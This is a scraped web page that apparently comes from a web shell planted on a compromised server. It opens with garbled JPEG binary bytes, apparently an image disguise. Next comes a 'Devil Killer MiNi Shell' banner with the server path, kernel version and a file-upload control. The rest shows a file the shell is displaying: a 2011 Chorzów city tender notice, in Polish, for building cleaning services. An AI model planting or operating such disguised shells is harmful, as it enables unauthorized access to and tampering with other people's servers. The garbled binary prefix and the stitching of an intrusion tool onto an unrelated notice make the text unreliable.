JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110207/42553-N-2011.html

<p class="kh_header"><b>Chorzów: Świadczenie usługi kompleksowego utrzymania czystości w budynkach Urzędu Miasta w Chorzowie, w okresie od 01.04.2011 - 31.03.2013</b><br>
<b>Numer ogłoszenia: 42553 - 2011; data zamieszczenia: 07.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Chorzów Wydział Administracyjny , Rynek 1, 41-500 Chorzów, woj. śląskie, tel. 0-32 2410-110, faks 0-32 2410-110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chorzow.um.gov.pl/bip/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi kompleksowego utrzymania czystości w budynkach Urzędu Miasta w Chorzowie, w okresie od 01.04.2011 - 31.03.2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi kompleksowego utrzymania czystości na terenie budynków UM i USC w Chorzowie o łącznej powierzchni ok. 4.850 m/2..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówienia jest świadczenie usługi kompleksowego utrzymania czystości na terenie budynków UM i USC w Chorzowie o łącznej powierzchni ok. 4.850 m/2.  tj.:

1.Stałe kompleksowe utrzymanie czystości biur, wyposażenia pomieszczeń, (także techniczne oprócz komputerów i telefonów) niezależnie od aktualnego wykorzystania pomieszczenia, utrzymanie czystości korytarzy, schodów :
-sprzątanie 1 raz dziennie  3394,54 m/2      UM
-sprzątanie 2 razy dziennie 358,15 m/2       UM
-sprzątanie 1 raz w tygodniu 145,61 m/2     UM
-sprzątanie 2 razy w tygodniu 35,63 m/2     UM
-sprzątanie 1 raz dziennie  131, 60 m/2       USC
-sprzątanie 2 razy w tygodniu 142, 10m/2   USC
-bieżące utrzymanie czystości ogólnodostępnych pomieszczeń sanitarnych
kosze na śmieci w biurach opróżniane muszą być codziennie wraz z dostarczeniem nowych worków na śmieci ( ok. 200 pomieszczeń biurowych)
do utrzymania czystości ścian i gzymsów korytarzy i pomieszczeń malowanych nietrwale wykorzystywać należy odkurzaczy plecakowych 
do mycia podłóg używać należy odpowiednich preparatów pielęgnująco-nabłysz-czających  (preparaty muszą posiadać właściwości antypoślizgowe)
powierzchnie zabezpieczone polimerami należy właściwie pielęgnować i na bieżąco, wg potrzeb je uzupełniać

     Aktualizacja wielkości powierzchni może zostać dokonana zależnie od aktualnych potrzeb. Zamawiającego i podlegać będzie opłacie  wg iloczynu ceny za 1 m/2 i ilości wysprzątanej powierzchni (m2). 
2.  stałe utrzymanie czystości w 2 windach, palarni i 14+3 toaletach - tj.ok. 250 m/2 ( stały dyżur w godzinach pracy UM), w tym utrzymanie czystości kafelek na ścianach WC ok. 700 m/2- luster, mycie sanitariatów, umywalek (używanie urządzenia parowego oraz do dezynfekcji), stałe uzupełnianie papieru toaletowego (jumbo) oraz mydła w płynie do dozowników 
3.  1 krotne mycie opraw oświetleniowych (komplet ok 1600 szt.) w budynkach UM 
4.  1 krotne mycie witraży w dużej sali posiedzeń UM o powierzchni 41, 28 m/2 tj. 
     3 szt. o wymiarze  6, 4 m wys  i 2,15 m szerokości
5.  4 krotne mycie wszystkich okien PCV w obiektach UM (różne położenie,ok. 400 
     szt - tj.  ok. 1.240,00 m/2) - dwustronnie z parapetami zewnętrznymi i   
     wewnętrznymi i ramami</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy,którzy spełniają warunki art.22 ust.1  PZP, dotyczące

1a. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1b. posiadania niezbędnej wiedzy i doświadczenia
1c. dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamó-
      wienia; 
1d. znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
      zamówienia;
1e. nie podlegania  wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust 2 PZP oraz spełnianie następujących warunków dodatkowych:
2a. Wykonawca zatrudniał w okresie ostatnich 3 lat tj. 2008-2010, a w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie, średniorocznie minimum 10  pracowników, a obecnie dysponuje co najmniej 9 pracownikami 
przeznaczonymi do realizacji niniejszego zadania - oświadczenie pisemne Wykonawcy
2b.wykonał lub wykonuje należycie w  okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego (a jeżeli okres działalności jest krótszy,w tym okresie) co najmniej jedno zamówienie świadczone w systemie ciągłym przez okres co najmniej 12 miesięcy na rzecz jednego Zamawiającego, o podobnym zakresie utrzymania czystości .  Za usługę podobną  Zamawiający uzna sprzątanie obiektów o charakterze i o powierzchni porównywalnej z przedmiotem zamówienia w tym stałe sprzątanie min. 4000 m2 powierzchni biurowej budynku (x12 mieś.).
2c. dysponują niezbędnymi do wykonania zamówienia narzędziami i urządzeniami.   

2. Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje  następującymi narzędziami i urządzeniami:
-Szorowarka z urządzeniem myjącym do posadzek kamiennych i lastrico - min 1 szt
-Urządzenie  polerujące do posadzek kamiennych i lastrico - min 1 szt
-Odkurzacz przemysłowy - min. 3 szt.
-Odkurzacz plecakowy - min. 1 szt 
-Wózki dwu wiaderkowe z mopami - 1 szt dla każdego pracownika
 -Urządzenie parowe do czyszczenia płytek ściennych - min. 1 szt
 -Urządzenie dezynfekcyjne do sprzętu sanitarnego WC - min 1 szt
 2d. posiadają zawarte ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na sumę ubezpieczenia nie niższą niż 500.000 zł/ rok

Zamawiający ogranicza możliwość ubiegania się o zamówienie publiczne tylko dla Wykonawców u których ponad 50% pracowników stanowią osoby niepełnosprawne w rozumieniu ustawy Pzp.W celu wykazania się spełnianiem tego warunku należy przedłożyć stosowne oświadczenie.2. Informacja o oświadczeniach jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
a. Wykaz wykonanych lub wykonywanych usług podobnych w zakresie utrzymania 
   czystości,  w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego 
   postępowania,  a jeżeli ten okres prowadzenia działalności jest krótszy- w tym 
   okresie, odpowiadających swoim rodzajem i wartościom usługom stanowiącym 
   przedmiot zamówienia z podaniem  ich wartości (z podatkiem VAT), przedmiotu, 
   dat wykonania i odbiorców  według wzoru stanowiącego Załącznik Nr 1 oraz 
   załączenie dokumentów potwierdzających że w/w usługi te zostały należycie 
   wykonane.W przypadku składania oferty wspólnej Wykonawcy składają jeden 
   wspólny w/w wykaz.
b. oświadczenie o przeciętnej liczbie zatrudnionych pracowników w okresie 
    ostatnich 3  lat według wzoru stanowiącego Załącznik Nr 2 do niniejszej SIWZ. 
    W przypadku  składania oferty wspólnej ww dokument składa każdy z 
    Wykonawców składających  ofertę wspólną 
c. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń jakimi 
    dysponuje  Wykonawca wg wzoru stanowiącego Załącznik Nr 3. W przypadku 
    składania oferty wspólnej Wykonawcy składający ofertę wspólną składają jeden 
    wspólny w/w wykaz.
d. Oświadczenie o zapewnieniu jednolitego umundurowania i możliwości identyfikacji 
     pracowników świadczących usługę oraz oświadczenie co do ilości osób, które 
     będą wykonywać zamówienie w pełnym wymiarze czasu ( 8h dziennie i 40 h 
     tygodniowo.  
     Jeżeli wykonawca przewiduje wykonanie przez osoby w niepełnym wymiarze 
     czasu ma obowiązek wykazać ilość osób i w jakim wymiarze czasu pracy będą 
     zatrudnieni do wykonania usługi w zakresie utrzymania czystości. W przypadku 
     składania oferty wspólnej Wykonawcy składają jeden wspólny dokument -    
     Załącznik nr 4.
e. Szczegółowy wykaz środków czyszczących, dezynfekujących i myjących przewi-
    dzianych do realizacji zamówienia - z opisem zakresu zastosowania (zgodnie z  
    załączoną instrukcją producenta) -Załącznik nr 5
f. Oświadczenie gwarantujące, że usługa świadczona będzie przy użyciu 
   materiałów,  urządzeń oraz środków czystości i dezynfekcyjnych posiadających 
   znak zgodności  CE, a wszystkie preparaty posiadają aktualne pozwolenie PZH na 
   wprowadzenie do obrotu, aktualne pozwolenie na tymczasowe wprowadzenie do 
   obrotu produktu oraz   oświadczenie, że wszelkie materiały do mycia podłóg są 
   preparatami antypoślizgowymi, ulegającymi biodegradacji oraz że w obiekcie nie 
   będą stosowane substancje  niebezpieczne - Załącznik nr 6
g.Aktualna polisa lub inny dokument potwierdzający, że Wykonawca jest 
   ubezpieczony  od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
   gospodarczej na  min. 500.000 zł. W przypadku składania ofert wspólnej ww 
   dokument składa każdy z Wykonawców składających ofertę wspólną - Załącznik 
   nr 7
h. Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 pkt 1,2,3,4 
    PZP- podpisany Załącznik Nr 8. W przypadku składania oferty wspólnej ww 
    oświadczenia składa pełnomocnik w imieniu wykonawców składających ofertę 
    wspólną. Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 pkt 
    4 PZP (nie podleganie wykluczeniu z postępowania z powodu okoliczności 
    zawartych w art. 24 ust.1 PZP - podpisany Załącznik Nr 9. W przypadku 
    składania oferty wspólnej ww  oświadczenie składa każdy z Wykonawców 
    składających ofertę wspólną
j.Aktualny odpis z właściwego rejestru, wystawiony nie wcześniej niż 6 miesięcy 
  przed  upływem terminu składania ofert. W przypadku składania oferty wspólnej 
  w/w dokument składa każdy z Wykonawców składających ofertę wspólną - 
  Załacznik nr 10 
k. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 
   24  ust. 1 pkt 4-8 ustawy wystawiona nie wcześniej niż 6 miesięcy przed 
   upływem terminu składania ofert - Załącznik nr 11
l. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 
  24  ust. 1 pkt 9 ustawy wystawiona nie wcześniej niż 6 miesięcy przed upływem 
  terminu   składania ofert - Załącznik nr 12

Inne oświadczenia i dokumenty które należy przedłożyć z ofertą:

a. wypełniony (Formularz ofertowy)-wg wzoru Załącznik Nr13. W przypadku składa- 
   -nia oferty wspólnej Wykonawcy składający ofertę wspólną składają jeden 
     wspólny  ww wykaz.
b. Dokument potwierdzający uprawnienie osób podpisujących ofertę-
    pełnomocnictwo,  o ile nie wynika inaczej z przepisów prawa lub innych 
    dokumentów rejestrowych w oryginale lub notarialnie potwierdzonej kserokopii - 
    Załącznik nr 14.
c.  W przypadku składania oferty przez podmioty ubiegajace się wspólnie o 
     udzielenie  zamówienia pełnomocnictwo określające jego zakres i podpisane 
     przez osoby upoważnione do reprezentowania ich w postępowaniu o udzielenie 
     zamówienia albo  reprezentowania w postępowaniu i zawarcia umowy w 
     sprawie zamówienia publicznego, stosownie do art 23 ust.2 ustawy - Załącznik 
     nr 15. Wszelka korespondencja oraz rozliczenia z tytułu umowy o wykonanie 
     zamówienia publicznego dokonywane będą wyłącznie z pełnomocnikiem. 
d. Oświadczenie Wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w 
    rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu 
    osób  niepełnosprawnych , lub w rozumieniu właściwych przepisów państw 
    członkowskich  Unii Europejskiej  lu Europejskiego Obszaru Gospodarczego - 
    jeżeli wykonawca ma  siedzibę lub miejsce zamieszkania w tych państwach - 
    Załącznik nr 16 
e. Zaparafowany wzór umowy - Załącznik Nr 17

3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej  Polskiej zamiast dokumentów, o których mowa w pkt III 2i , przedkłada odpowiednio dokumenty wymienione w §2  Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawców oraz form, w jakich te dokumenty mogą być składane. 
4. Dokumenty wymienione w pkt 2 do SIWZ mogą być przedłożone w formie kserokopii potwierdzonej za zgodność z oryginałem /adnotację takiej treści należy umieścić na dokumencie i podpisać (w oryginale) przez Wykonawcę/.
5. Wykonawcy którzy polegają na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów musi przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie w/w warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów załączonych do oferty wg formuły /spełnia - nie spełnia/. 

Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww warunki Wykonawca spełnił. Nie spełnienie chociażby jednego z warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje      następującymi narzędziami i urządzeniami:
-Szorowarka z urządzeniem myjącym do posadzek kamiennych i lastrico - min 1 szt
-Urządzenie  polerujące do posadzek kamiennych i lastrico - min 1 szt
-Odkurzacz przemysłowy - min. 3 szt.
-Odkurzacz plecakowy - min. 1 szt 
-Wózki dwu wiaderkowe z mopami - 1 szt dla każdego pracownika
 -Urządzenie parowe do czyszczenia płytek ściennych - min. 1 szt
 -Urządzenie dezynfekcyjne do sprzętu sanitarnego WC - min 1 szt</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zatrudniał w okresie ostatnich 3 lat tj. 2008-2010, a w przypadku, 
gdy okres prowadzenia działalności jest krótszy - w tym okresie, średniorocznie minimm 10  pracowników, a obecnie dysponuje co najmniej 9 pracownikami przezna-czonymi do realizacji niniejszego zadania - oświadczenie pisemne Wykonawcy Oświadczenie o zapewnieniu jednolitego umundurowania i możliwości identyfikacji 
pacowników świadczących usługę oraz oświadczenie co do ilości osób, które będą 
wykonywać zamówienie w pełnym wymiarze czasu ( 8h dziennie i 40 h tygodniowo.  
Jeżeli wykonawca przewiduje wykonanie przez osoby w niepełnym wymiarze czasu 
ma obowiązek wykazać ilość osób i w jakim wymiarze czasu pracy będą zatrudnieni 
do wykonania usługi w zakresie utrzymania czystości. W przypadku składania oferty 
wspólnej Wykonawcy składają jeden wspólny dokument</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy,którzy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - oświadczenie.
Pzedstawią aktualną polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na min. 500.000 zł. W przypadku składania ofert wspólnej ww dokument składa każdy z Wykonawców składających ofertę wspólną</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
